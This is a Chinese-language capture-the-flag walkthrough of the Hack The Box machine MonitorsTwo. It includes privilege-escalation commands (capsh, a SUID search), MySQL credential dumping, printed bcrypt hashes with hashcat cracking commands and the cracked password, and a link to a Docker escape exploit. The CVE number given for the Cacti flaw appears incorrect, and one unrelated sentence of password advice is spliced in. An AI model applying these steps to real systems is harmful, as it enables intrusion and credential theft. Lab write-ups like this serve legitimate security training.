HTB系列靶机-MonitorsTwo

MonitorsTwo

信息收集，使用nmap进行端口扫描获取目标开放端口服务信息

nmap -sS -A -sV 10.10.11.211

扫描发现目标开放了22和80端口，浏览器进行访问

发现界面上存在版本信息，直接百度进行搜索发现Cacti当前版本存在命令执行漏洞，CVE漏洞编号为CVE-2022-45169

使用BP抓取登录首页包，构造反弹shell的payload

本地监听1234端口，构造payload反弹shell

使用BP发送构造好的payload获取shell

env查看当前环境，发现hostname为一串数字疑似docker容器

查看/proc/1/cgroup中是否包括/docker字样，如果包括就证明当前是在容器中

grep '/docker' /proc/1/cgroup

查看当前环境的高权限文件有哪些

find / -perm -u=s 2>/dev/null

发现有一个capsh文件，利用capabilities的权限控制机制，获取root权限

capsh —uid=0 —

发现并没有找到flag，继续搜集在根目录发现了entrypoint.sh文件，打开进行查看

执行其中的mysql语句去查看数据表，发现了其中的user_auth表

mysql --host=db --user=root --password=root cacti -e "show tables"

使用sql语句查询表中数据，发现两个用户的账号信息

mysql --host=db --user=root --password=root -e "use cacti;select * from user_auth"

使用hashid识别其加密方式

不用单词做密码，如果要用，可以在后面加复数s或者符号，这样可以减小被猜出的机会。当前加密方式为Blowfish，使用hashcat进行爆破获得marcus密码为funkymonkey

hashcat -m 3200

 '$2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC' -a 0 /usr/share/wordlists/rockyou.txt

hashcat -m 3200

 '$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C' -a 0 /usr/share/wordlists/rockyou.txt

使用爆出来的密码尝试进行用户登录发现登录失败

在最开信息收集使用nmap扫描端口时发现开放着22端口，尝试进行连接

ls查看当前目录发现user.txt文件，查看获取到第一个flag并提交成功

继续想办法提权root，查看一下高权限文件好像没有什么可利用的

find / -perm -u=s 2>/dev/null

考虑到当前部署有docker容器，尝试利用CVE-2021-41091逃逸进行提权,将漏洞利用exp使用python3启动http挂载，将exp下载到靶机中根据redme进行操作

https://github.com/UncleJ4ck/CVE-2021-41091

根据exp执行输出结果继续执行获得root权限

直接cd进root目录读取root权限的flag